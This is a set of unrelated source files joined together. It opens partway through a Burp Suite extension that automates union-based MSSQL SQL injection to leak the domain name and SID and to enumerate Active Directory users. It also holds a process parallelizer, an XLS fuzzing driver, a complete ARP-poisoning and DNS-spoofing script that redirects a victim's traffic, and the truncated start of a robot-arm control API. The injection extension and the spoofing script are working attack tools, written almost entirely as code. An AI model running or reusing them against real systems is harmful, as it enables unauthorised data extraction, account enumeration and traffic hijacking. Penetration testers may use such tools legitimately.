#Results section
self.t1r6.add(swing.JLabel("Results Output:"))
self.t1r6.add(self.outputScroll)
self.t1r7.add(swing.JButton("Copy results to Clipboard", actionPerformed=self.copyToClipboard))
self.t1r7.add(swing.JButton("Clear", actionPerformed=self.clearOutput))
# Add the GUI objects into the first tab
self.duetTab.add(self.t1r1)
self.duetTab.add(self.t1r2)
self.duetTab.add(self.t1r3)
self.duetTab.add(self.t1r4)
self.duetTab.add(self.t1r5)
self.duetTab.add(self.t1r6)
self.duetTab.add(self.t1r7)
# Now that the GUI objects are added, we can resize them to fit snug in the UI
self.t1r1.setMaximumSize(Dimension(850, 100))
self.t1r2.setMaximumSize(Dimension(875, 50))
self.t1r3.setMaximumSize(Dimension(800, 75))
self.t1r4.setMaximumSize(Dimension(800, 200))
self.t1r5.setMaximumSize(Dimension(800, 50))
self.t1r6.setMaximumSize(Dimension(800, 200))
self.t1r7.setMaximumSize(Dimension(800, 200))
#Register the panel in the Burp GUI
callbacks.addSuiteTab(self)
return
#Create context menu entry
def createMenuItems(self,invocation):
self.context = invocation
itemContext = invocation.getSelectedMessages()
if itemContext > 0:
menuList = ArrayList()
menuItem = swing.JMenuItem("Send request to MSSQLi-DUET", actionPerformed=self.writeRequestToTextBox)
menuList.add(menuItem)
return menuList
return None
def writeRequestToTextBox(self,event):
self.httpTraffic = self.context.getSelectedMessages()
httpRequest = [item.request.tostring() for item in self.httpTraffic]
request = ''.join(httpRequest)
self.requestTxt.text = request
def buildRequest(self):
stdout = PrintWriter(self._callbacks.getStdout(), True)
#Get data about the request that was right clicked
for item in self.httpTraffic:
try:
httpService = item.getHttpService()
host = httpService.host
port = httpService.port
protocol = httpService.protocol
protoChoice = True if protocol.lower() == 'https' else False
#Parse the text area that should contain an HTTP request.
requestInfo = self._helpers.analyzeRequest(self.requestTxt.text)
#Request datas
headers = requestInfo.getHeaders()
bodyOffset = requestInfo.bodyOffset
body = self.requestTxt.text[bodyOffset:]
content_type = ""
for (i, header) in enumerate(headers):
if header.lower().startswith("content-type:"):
content_type = header.split(":")[1].lower().strip()
if content_type == "":
print("[-] No content-type header found. This could have detrimental effects.")
method = headers[0].split(" ")[0]
urlpath = headers[0].split(" ")[1]
#Debugging area for output and parsing
#stdout.println(str(body))
#stdout.println(str(headers))
#stdout.println(str(method))
#stdout.println(str(content_type))
#stdout.println(str(urlpath))
#Check param box for the vulnerable parameter and then build the payloads out.
parameter = self.paramBox.getText()
data = self.injectBox.getText()
if method == "GET":
body = urlpath.split("?")[1]
params = dict(x.split('=') for x in body.split('&'))
else:
#Add logic here for the handling parameters in body and JSON content
if "json" in str(content_type) or "JSON" in str(content_type):
params = json.loads(body)
print(body)
print(params)
else:
params = dict(x.split('=') for x in body.split('&'))
print(params)
#Check column numbers and type
column_number,column_type = self.determine_columns(host,port,protoChoice,headers,params,method,urlpath,content_type,parameter,data)
if column_number == None or column_type == None:
break
#Get domain name
domain_name = self.leak_domain_name(host,port,protoChoice,headers,params,method,urlpath,content_type,parameter,data,column_number,column_type)
#Get SID
domain_sid = self.extract_sid(host,port,protoChoice,headers,params,method,urlpath,content_type,parameter,data,column_number,column_type,domain_name)
#Enum users
ad_data = self.enum_users(host,port,protoChoice,headers,params,method,urlpath,content_type,parameter,data,column_number,column_type,domain_name,domain_sid)
print("[!] Finished!")
self.outputTxt.append("[!] Finished!" + "\n")
except Exception as ex:
stdout.println("Problem parsing the request data" + "\n")
self.outputTxt.setText("[-] Problem parsing the request data. Check debug output for more details.")
stdout.println(ex)
return
def postRequest(self,headers,body,args_):
#Needed: args=[host,port,protoChoice,request]
stdout = PrintWriter(self._callbacks.getStdout(), True)
request = self._helpers.buildHttpMessage(headers,body)
args_.append(request)
t = threading.Thread(target=self.makeRequest,args=args_)
t.daemon = True
t.start()
t.join()
def getRequest(self,headers,args_):
#Needed: args=[host,port,protoChoice,request]
stdout = PrintWriter(self._callbacks.getStdout(), True)
body = "\r\n"
request = self._helpers.buildHttpMessage(headers,body)
args_.append(request)
t = threading.Thread(target=self.makeRequest,args=args_)
t.daemon = True
t.start()
t.join()
def makeRequest(self,host,port,protoChoice,request):
stdout = PrintWriter(self._callbacks.getStdout(), True)
try:
self.resp = self._callbacks.makeHttpRequest(
host,
port,
protoChoice,
request
)
except Exception as ex:
stdout.println(ex)
# Standard function: Set the tab name
def getTabCaption(self):
return BurpExtender.EXT_NAME
# Standard function: Set the GUI component in the tab
def getUiComponent(self):
return self.tab
#Clear the request box
def clearRequest(self, event):
self.requestTxt.setText("")
return
#Clear the output box
def clearOutput(self, event):
self.outputTxt.setText("")
return
#Main execution function
def executePayload(self, event):
self.buildRequest()
return
#copy output to clipboard for easy copy pasta of the results so it can be imported into intruder or different tools
def copyToClipboard(self, event):
clipboard = Toolkit.getDefaultToolkit().getSystemClipboard()
data = StringSelection(self.outputTxt.getText())
clipboard.setContents(data, None)
return
# SQL injection functions
#=====================================================================================
#Logic to determine the number of columns and the type of data that can be used.
def determine_columns(self,host,port,protoChoice,headers,body,method,urlpath,content_type,parameter,data):
stdout = PrintWriter(self._callbacks.getStdout(), True)
print("[+] Determining the number of columns in the table...")
self.outputTxt.append("[+] Determining the number of columns in the table..." + "\n")
payload = data
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (str(key),str(val)) for (key,val) in body.iteritems())
print(new_body)
else:
new_body = json.dumps(body)
#Make the request
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
print(headers)
try:
self.getRequest(headers,[host,port,protoChoice])
except:
print("[-] Error determining number of columns.")
else:
try:
self.postRequest(headers,new_body,[host,port,protoChoice])
except:
print("[-] Error determining number of columns.")
baseline = self.resp.tostring()
payload = data + " order by 1--"
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (str(key),str(val)) for (key,val) in body.iteritems())
print(new_body)
else:
new_body = json.dumps(body)
print(new_body)
#Make the request
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
try:
self.getRequest(headers,[host,port,protoChoice])
except:
print("[-] Error determining number of columns.")
else:
try:
self.postRequest(headers,new_body,[host,port,protoChoice])
except:
print("[-] Error determining number of columns.")
return None
second_response = self.resp.tostring()
# Modify logic here if the baseline request and the second response are actually always the same.
if len(baseline) == len(second_response):
print("[-] Error determining number of columns. Check payload or encoding")
self.outputTxt.setText("[-] Error determining number of columns. Check payload or encoding method appropriateness.")
column_number = None
column_type = None
return column_number,column_type
#Increment order by value to determine number of columns
i = 2
valid = True
while valid:
payload = data + " order by %d--" % i
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (str(key),str(val)) for (key,val) in body.iteritems())
print(new_body)
else:
new_body = json.dumps(body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
newdata = self.resp.tostring()
if len(second_response) != len(newdata):
valid = False
break
#Break and error if there are too many columns. This is indicative of a logic error/infinite loop
elif i == 50:
valid = False
print("[-] Could not determine number of columns. Check payload and request data.")
break
return None
else:
i += 1
continue
column_number = (i-1)
print(column_number)
self.outputTxt.append(str(column_number) + "\n")
#Now determine what can be used for the column type
print("[+] Determining column type...")
self.outputTxt.append("[+] Determining column type..." + "\n")
try_types = ['null','1','test']
for j in try_types:
payload = data
payload += generate_payload(column_number,j)
payload += "@@version--"
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
print(body)
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (str(key),str(val)) for (key,val) in body.iteritems())
print(new_body)
else:
new_body = json.dumps(body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
new_response = self.resp.tostring()
determinant = str(new_response)
column_type = None
if "Microsoft" in determinant:
column_type = j
print(j)
self.outputTxt.append(j + "\n")
break
else:
print("Column type not" + j)
self.outputTxt.append("Column not " + j + "\n")
return column_number,column_type
#Function to extract the name of the Domain from the database
def leak_domain_name(self,host,port,protoChoice,headers,body,method,urlpath,content_type,parameter,data,column_number,column_type):
print("[+] Discovering domain name...")
self.outputTxt.append("[+] Discovering domain name..." + "\n")
payload = data
payload += generate_payload(column_number,column_type)
payload += "(SELECT CONCAT ( 'W00TW00T', (select default_domain()), 'W00TW00T' ) AS Result)--"
#payload += "(CAST((SELECT CONCAT ( 'W00TW00T', (select default_domain()), 'W00TW00T' ) AS Result) as nvarchar(4000)))"
payload += "," + column_type + "--"
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
print(body)
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (key,str(val)) for (key,val) in body.iteritems())
print(new_body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
determinant = self.resp.tostring()
leaked_domain = str(re.search(r"(?<=W00TW00T)(.+?)(?=W00TW00T)",determinant).group())
print(leaked_domain)
self.outputTxt.append(leaked_domain + "\n")
return leaked_domain
#Use injection to leak the domain SID value in hex format
def extract_sid(self,host,port,protoChoice,headers,body,method,urlpath,content_type,parameter,data,column_number,column_type,domain):
print("[+] Discovering domain SID...")
self.outputTxt.append("[+] Discovering domain SID..." + "\n")
payload = data
payload += generate_payload(column_number,column_type)
payload += "(SELECT CONCAT ( 'W00TW00T', (select sys.fn_varbintohexstr(SUSER_SID('%s\\Administrator'))), 'W00TW00T' ) AS Result)--" % domain
#payload += "(CAST((SELECT CONCAT ( 'W00TW00T', (select sys.fn_varbintohexstr(SUSER_SID('%s\\Administrator'))), 'W00TW00T' ) AS Result) as nvarchar(4000)))" % domain
payload += "," + column_type + "--"
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
print(body)
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (key,str(val)) for (key,val) in body.iteritems())
print(new_body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
determinant = self.resp.tostring()
leaked_sid = str(re.search(r"(?<=W00TW00T)(.+?)(?=W00TW00T)",determinant).group())
result = prepare_sid(leaked_sid)
print(result)
self.outputTxt.append(result + "\n")
return result
#Enumerate for AD users given a range
def enum_users(self,host,port,protoChoice,headers,body,method,urlpath,content_type,parameter,data,column_number,column_type,domain,sid):
print("[+] Enumerating Active Directory via SIDs...")
self.outputTxt.append("[+] Enumerating Active Directory via SIDs..." + "\n" )
max_rid = self.ridMaxBox.getText()
min_rid = self.ridMinBox.getText()
time_delay = self.delayBox.getText()
users_list = []
for i in range(int(min_rid),int(max_rid)):
i = str(i)
payload = data
payload += generate_payload(column_number,column_type)
payload += "(SELECT CONCAT ( 'W00TW00T', (SUSER_SNAME(SID_BINARY(N'%s%s'))), 'W00TW00T' ) AS Result)--" % (sid,i)
#payload += "(CAST(((SELECT CONCAT ( 'W00TW00T', (SUSER_SNAME(SID_BINARY(N'%s%s'))), 'W00TW00T' ) AS Result) as nvarchar(4000)))" % (sid,i)
payload += "," + column_type + "--"
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
print(body)
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (key,str(val)) for (key,val) in body.iteritems())
print(new_body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
determinant = self.resp.tostring()
if domain in determinant:
username = str(re.search(r"(?<=W00TW00T)(.+?)(?=W00TW00T)",determinant).group())
users_list.append(username)
time.sleep(int(time_delay))
for i in users_list:
self.outputTxt.append(i + "\n")
print(i)
return users_list
#=============================================================================================================
#Burp Error Debugging
'''
try:
FixBurpExceptions()
except:
pass
'''
# Begin tamper functions
# Modify area with tamper functions that you wish to use,
# and then modify args for the dropdown and the payload_processing() function
#
# https://github.com/sqlmapproject/sqlmap/tree/master/tamper
#==============================================================================================================
#Unescaped unicode for JSON type data
def unicode_encode_unescaped(payload):
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += "u%.4X" % ord(payload[i])
i += 1
return retVal
#Escaped unicode
def unicode_encode(payload):
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "\\u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += "\\u%.4X" % ord(payload[i])
i += 1
return retVal
def chardoubleencode(payload):
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])
i += 1
return retVal
def unmagicquotes(payload):
retVal = payload
if payload:
found = False
retVal = ""
for i in range(len(payload)):
if payload[i] == '\'' and not found:
retVal += "%bf%27"
found = True
else:
retVal += payload[i]
continue
if found:
_ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
if _ != retVal:
retVal = _
retVal += "-- -"
elif not any(_ in retVal for _ in ('#', '--', '/*')):
retVal += "-- -"
return retVal
#Payload processing function - Detemines encoding path based on args.
#=======================================================================================
def payload_processing(payload,encoding):
if encoding == 'unicode':
mod_payload = unicode_encode(payload)
elif encoding == 'unicode_unescaped':
mod_payload = unicode_encode_unescaped(payload)
elif encoding == 'doubleencode':
mod_payload = chardoubleencode(payload)
elif encoding == 'unmagicquotes':
mod_payload = unmagicquotes(payload)
else:
mod_payload = payload
return mod_payload
#Helper functions here
#========================================================================================
#Convert hex representation of SID into an actual SID string value
def sid_to_str(sid):
if sys.version_info.major < 3:
revision = ord(sid[0])
else:
revision = sid[0]
if sys.version_info.major < 3:
number_of_sub_ids = ord(sid[1])
else:
number_of_sub_ids = sid[1]
iav = struct.unpack('>Q', b'\x00\x00' + sid[2:8])[0]
sub_ids = [struct.unpack('<I', sid[8 + 4 * i:12 + 4 * i])[0]
for i in range(number_of_sub_ids)]
return 'S-{0}-{1}-{2}'.format(revision, iav, '-'.join([str(sub_id) for sub_id in sub_ids]))
#Modify the SID hex value retrieved from query
def prepare_sid(sid):
#hex_string = bytes.fromhex(sid[2:]) #python3 way
hex_data = sid[2:]
hex_string = hex_data.decode("hex")
mod_sid = sid_to_str(hex_string)
domain_sid_data = mod_sid.split('-')[:7]
domain_sid = '-'.join(domain_sid_data) + "-"
#print(domain_sid+"\n")
return domain_sid
#Prep the union select preamble
def generate_payload(column_number,column_type):
i = 0
payload = " UNION SELECT "
while i < (column_number - 2):
payload += (column_type + ",")
i += 1
return payload
|
process_parallelizer.py
|
import multiprocessing
from typing import List
from parallelizer.executor import Executor
from parallelizer.executor_event import ExecutorEvent
from parallelizer.parallelizer import Parallelizer
class ProcessParallelizer(Parallelizer):
def __init__(self, number_of_threads: int, timeout_in_seconds: float = 60):
super().__init__(number_of_threads, timeout_in_seconds)
def start_executors(self, executors: List[Executor]) -> List[ExecutorEvent]:
# Keep return values in a memory-shared dict
return_dict = multiprocessing.Manager().dict()
# Start processes
executor_events = []
processes = []
for executor in executors:
executor_event = ExecutorEvent(executor.worker_index, None, return_dict)
executor_events.append(executor_event)
process = multiprocessing.Process(target=executor.execute_all, args=[executor_event])
processes.append(process)
process.start()
# Wait for all processes to finish
for process in processes:
process.join(self.timeout_in_seconds)
# Map results back from shared dict into each event
for executor_event in executor_events:
executor_event.results = return_dict[executor_event.worker_index]
# Return events
return executor_events
|
run_fuzz_multiprocess_main.py
|
# Lint as: python3
#
# Copyright 2020 The XLS Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Multi-process fuzz driver program.
Collects crash samples into a directory of the user's choosing.
"""
import datetime
import multiprocessing as mp
import os
import random
import sys
from absl import app
from absl import flags
import psutil
from xls.common import gfile
from xls.common import multiprocess
from xls.fuzzer import cli_helpers
from xls.fuzzer import run_fuzz_multiprocess
from xls.fuzzer.python import cpp_ast_generator as ast_generator
from xls.fuzzer.python import cpp_sample as sample
flags.DEFINE_integer('seed', 0, 'Seed value for generation')
flags.DEFINE_integer('sample_count', 1024, 'Number of samples to generate')
flags.DEFINE_string('duration', None,
'Duration to run the sample generator for')
flags.DEFINE_integer('calls_per_sample', 512,
'Arguments to generate per sample')
flags.DEFINE_string('crash_path', None, 'Path at which to place crash data')
flags.DEFINE_string(
'save_temps_path', None, 'Path of directory in which to save temporary '
'files. These temporary files include DSLX, IR, and arguments. A '
'separate numerically-named subdirectory is created for each sample')
flags.DEFINE_integer(
'worker_count', None, 'Number of workers to use for execution; defaults '
'to number of physical cores detected')
flags.DEFINE_boolean('disallow_divide', True,
'Exclude generation of divide operator')
flags.DEFINE_boolean('emit_loops', True, 'Emit loops in generator')
flags.DEFINE_boolean(
'use_llvm_jit', True, 'Use LLVM JIT to evaluate IR. The interpreter is '
'still invoked at least once on the IR even with this option enabled, but '
'this option can be used to disable the JIT entirely.')
flags.DEFINE_boolean('codegen', False, 'Run code generation')
flags.DEFINE_boolean('simulate', False, 'Run Verilog simulation.')
flags.DEFINE_string('simulator', None,
'Verilog simulator to use. For example: "iverilog".')
flags.DEFINE_boolean('execute', True, 'Execute IR (vs simply code generation)')
flags.DEFINE_boolean(
'minimize_ir', True,
'If a crasher is found, attempt to reduce the IR to find a minimal '
'reproducer.')
flags.DEFINE_boolean('print_samples', False,
'Print generated samples (to stdout)')
flags.DEFINE_boolean(
'short_samples', False,
'Generate samples with small number of nested expressions')
flags.DEFINE_string(
'summary_path', None,
'Directory in which to write the sample summary information. This records '
'information about each generated sample including which XLS op types and '
'widths. Information is written in Protobuf format with one file per '
'worker. Files are appended to by the worker.')
flags.DEFINE_integer(
'max_width_bits_types', 64,
'The maximum width of bits types in the generated samples.')
flags.DEFINE_integer(
'max_width_aggregate_types', 1024,
'The maximum width of aggregate types (tuples and arrays) in the generated '
'samples.')
flags.DEFINE_boolean(
'use_system_verilog', True,
'If true, emit SystemVerilog during codegen otherwise emit Verilog.')
FLAGS = flags.FLAGS
QUEUE_MAX_BACKLOG = 16
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if FLAGS.simulate and not FLAGS.codegen:
raise app.UsageError('Must specify --codegen when --simulate is given.')
# Test that we can write to the crash and summary path.
for path in (FLAGS.crash_path, FLAGS.summary_path):
if path:
gfile.make_dirs(path)
with gfile.open(os.path.join(path, 'test'), 'w') as f:
print('test', file=f)
start = datetime.datetime.now()
physical_core_count = psutil.cpu_count(logical=False)
worker_count = FLAGS.worker_count or physical_core_count
worker_count = max(worker_count, 1) # Need at least one worker.
queues = (multiprocess.get_user_data() or
[mp.Queue() for _ in range(worker_count)])
queues = queues[:worker_count]
print('-- Creating pool of {} workers; physical core count {}'.format(
worker_count, physical_core_count))
workers = []
for i in range(worker_count):
queue = None if multiprocess.has_user_data_support() else queues[i]
target = run_fuzz_multiprocess.do_worker_task
args = (i, queue, FLAGS.crash_path, FLAGS.summary_path,
FLAGS.save_temps_path, FLAGS.minimize_ir)
worker = multiprocess.Process(target=target, args=args)
worker.start()
workers.append(worker)
duration_str = FLAGS.duration
duration = None if duration_str is None else cli_helpers.parse_duration(
duration_str)
seed = FLAGS.seed
if not seed:
seed = random.randrange(0, 1 << 31)
print('-- Using randomly generated seed:', seed)
sys.stdout.flush()
generator_options = ast_generator.AstGeneratorOptions(
disallow_divide=FLAGS.disallow_divide,
emit_loops=FLAGS.emit_loops,
short_samples=FLAGS.short_samples,
max_width_bits_types=FLAGS.max_width_bits_types,
max_width_aggregate_types=FLAGS.max_width_aggregate_types)
default_sample_options = sample.SampleOptions(
convert_to_ir=True,
optimize_ir=True,
use_jit=FLAGS.use_llvm_jit,
codegen=FLAGS.codegen,
simulate=FLAGS.simulate,
simulator=FLAGS.simulator,
use_system_verilog=FLAGS.use_system_verilog)
sample_count = run_fuzz_multiprocess.do_generator_task(
queues,
seed,
generator_options,
FLAGS.sample_count,
FLAGS.calls_per_sample,
default_sample_options=default_sample_options,
duration=duration,
print_samples=FLAGS.print_samples)
for i, worker in enumerate(workers):
print('-- Joining on worker {}'.format(i))
worker.join()
delta = datetime.datetime.now() - start
elapsed = delta.total_seconds()
print(
'-- Elapsed end-to-end: {} = {:.2f} seconds; {:,} samples; {:.2f} samples/s'
.format(delta, elapsed, sample_count, sample_count / elapsed))
if __name__ == '__main__':
def real_main(): # Avoid defining things in global scope.
flags.mark_flag_as_required('crash_path')
queues = tuple(mp.Queue(QUEUE_MAX_BACKLOG) for _ in range(128))
multiprocess.run_main(main, queues)
real_main()
|
dns_spoof.py
|
# dns_spoof.py
#
# Design and Program: Vishav Singh & Manuel Gonzales
#
# functions:
#
# def signal_handler(signum, frame)
# def sniffer()
# def get_address(interface, ip)
# def start_mitm(interface, victim, gateway)
# def parse(packet)
# def redirectionRules(victim)
# def getWebIP(website)
# def main()
#
# Program to spoof a DNS response to a victim machine, the way it works is that initially
# the program ARP poisons the victim into believing this system to be the gateway, This is
# done in order to sniff traffic and manipulate the DNS responses the victim machines gets
# to redirect them to a different website.
#
import setproctitle
import optparse
import signal
from netfilterqueue import NetfilterQueue
from multiprocessing import Process
from scapy.all import *
from scapy.layers.inet import IP, UDP, Ether
# Constants
CONST_DESTINATION_PORT = 53
CONST_DNS_SERVER = "8.8.8.8"
# Global
mitm_running = False
spoof_running = True
process_name = "None"
websites = [] #websites array
new_website = "None"
# main function to parse the arguments and start the processes of MITM and to sniff traffic
def main():
parser = optparse.OptionParser()
parser.add_option("-i", "--interface", type="string", dest="interface",
help="[REQUIRED] Local Interface to Use")
parser.add_option("-d", "--destination_ip", type="string", dest="destination_ip",
help="[REQUIRED] IP address to Sniff")
parser.add_option("-r", "--router_ip", type="string", dest="router_ip",
help="[REQUIRED] IP address of the gateway/router")
parser.add_option("-w", "--website", type="string", dest="website",
help="[REQUIRED] Website(s) to Spoof (Separated by commas)")
parser.add_option("-n", "--new_website", type="string", dest="new_website",
help="[REQUIRED] Website to redirect to")
parser.add_option("-t", "--title", type="string", dest="title",
help="[REQUIRED] Process name")
(options, args) = parser.parse_args()
if len(sys.argv) < 2:
parser.error("Use -h or --help for instructions")
if not options.interface or not options.destination_ip or not options.router_ip or not options.new_website or not options.website or not options.title:
parser.error("Please fill in all the required parameters")
global process_name
global new_website
global websites
try:
signal.signal(signal.SIGINT, signal_handler)
setproctitle.setproctitle(options.title)
process_name = options.title
websites = options.website.split(",")
new_website = getWebIP(options.new_website)
conf.verb = 0
redirectionRules(options.destination_ip)
except Exception:
print "Couldn't set options"
return
p1 = Process(target=start_mitm, args=(options.interface, options.destination_ip, options.router_ip))
p1.start()
p2 = Process(target=sniffer)
p2.start()
p1.join()
p2.kill()
# Function to stop all the processes in a clean manner when SIGNINT(Ctl + C) is found.
# signum - type of signal caught
# frame - stack frame
def signal_handler(signum, frame):
global spoof_running
global process_name
print ("Process %s is Stopping..." % process_name)
spoof_running = False
time.sleep(1)
print ("Stopped %s" % process_name)
sys.exit(0)
# Function to start the netfilter queue which gets all of the traffic to port 53 from the victim machine
# it then sends the packet for parsing. On stop if clears the firewall rules
def sniffer():
global process_name
setproctitle.setproctitle("sniffer")
process_name = "sniffer"
filterQueue = NetfilterQueue()
filterQueue.bind(1, parse)
try:
filterQueue.run()
except KeyboardInterrupt:
filterQueue.unbind()
os.system('iptables -t nat -F')
os.system('iptables -t nat -X')
# Function to resolve the MAC address of a system in the network.
# interface - local interface in use
# ip - IP of system to resolve
def get_address(interface, ip):
ans = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2, iface=interface, inter=0.1)
return ans[Ether].src
# Function to start ARP poisoning a victim system in order to be able to sniff all the traffic going
# to it, and also be able to tamper some of the traffic.
# interface - local interface in use
# victim - IP of the system to attack
# gateway - IP of the gateway/router
def start_mitm(interface, victim, gateway):
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
global spoof_running
global process_name
setproctitle.setproctitle("mitm")
process_name = "mitm"
try:
victim_address = get_address(interface, victim)
gateway_address = get_address(interface, gateway)
while spoof_running:
send(ARP(op=2, pdst=victim, psrc=gateway, hwdst=victim_address))
send(ARP(op=2, pdst=gateway, psrc=victim, hwdst=gateway_address))
time.sleep(0.5)
sys.exit(0)
except Exception:
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
print "Couldn't start MITM"
return
# Function to parse the packets that get to the netfilter queue (trough the IP tables rule)
# It will check if the packet is a DNS request and if it is it will act accordingly if the
# request is for one of the websites to be spoofed.
# packet - packet received to the queue
def parse(packet):
global websites
global new_website
payload = packet.get_payload()
pkt = IP(payload)
if not pkt.haslayer(DNSQR):
packet.accept()
else:
for website in websites:
if website in pkt[DNS].qd.qname:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=new_website))
spoofed_pkt.show()
packet.set_payload(str(spoofed_pkt))
packet.accept()
return
packet.accept()
# Function to redirect all the DNS traffic from the victim system into the nefilter queue
# victim - IP of victim system
def redirectionRules(victim):
os.system("iptables -t nat -A PREROUTING -p udp -s " + victim + " --dport " + str(CONST_DESTINATION_PORT) + " -j NFQUEUE --queue-num 1")
# Function to resolve the IP of a domain.
# website - domain name of website to redirect to
def getWebIP(website):
answer = sr1(IP(dst=CONST_DNS_SERVER)/UDP(dport=CONST_DESTINATION_PORT)/DNS(rd=1,qd=DNSQR(qname=website)),verbose=0)
data_number = answer.getlayer(DNS).ancount
if data_number == 0: #domain not found
return website
new_ip = answer.getlayer(DNS).an[data_number-1].rdata
return new_ip
# start script
main()
|
rt605_arm_control_api.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import rospy
import sys
import time
import numpy as np
import os
import datetime
from ctypes import *
import rospy
from enum import Enum
import threading
from control_node.msg import robot_info
# Init the path to the Hiwin Robot's SDK .dll file
CURRENT_FILE_DIRECTORY = os.path.dirname(os.path.abspath(__file__))
PARENT_DIRECTORY = os.path.dirname(CURRENT_FILE_DIRECTORY)
# The .dll file is contained in include\hiwin_robot_sdk\
HRSDK_DLL_PATH = os.path.join(PARENT_DIRECTORY, "include", "hiwin_robot_sdk",
"HRSDK.dll")
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = 0
self.y = 36.8
self.z = 11.35
self.pitch = -90
self.roll = 0
self.yaw = 0
def callback_function(cmd, rlt, msg, len):
#print(cmd)
pass
##ABS pos mm2cm
def AbsPostoGoal(pos):
pos[0] = pos[0]/0.1
pos[1] = pos[1]/0.1
pos[2] = pos[2]/0.1
return pos
##relate pos
def RelPosConvertGoal(pos):
if pos[0] != 0:
pos[0] = pos[0]/0.1
else:
pos[0] =0
if pos[1] !=0:
pos[1] = pos[1]/0.1
else:
pos[1] =0
if pos[2] !=0:
pos[2] = pos[2]/0.1
else:
pos[2] =0
return pos
def ctype_convert(target):
target_convert = (c_double * len(target))()
for convert_n, target in enumerate(target):
target_convert[convert_n] = c_double(target)
return target_convert
class HiwinRobotInterface(object):
"""Class used as bridge python-CPP and SDK."""
# The value of the robot state
IDLE_MOTION_STATE = 1
RUNNING_MOTION_STATE = 2
def __init__(self, robot_ip, connection_level, name=""):
# type: (str, int, str, str) -> None
"""Hiwin Robot SDK Initialization"""
# Initialize the variables
self.ip = robot_ip
self.level = connection_level
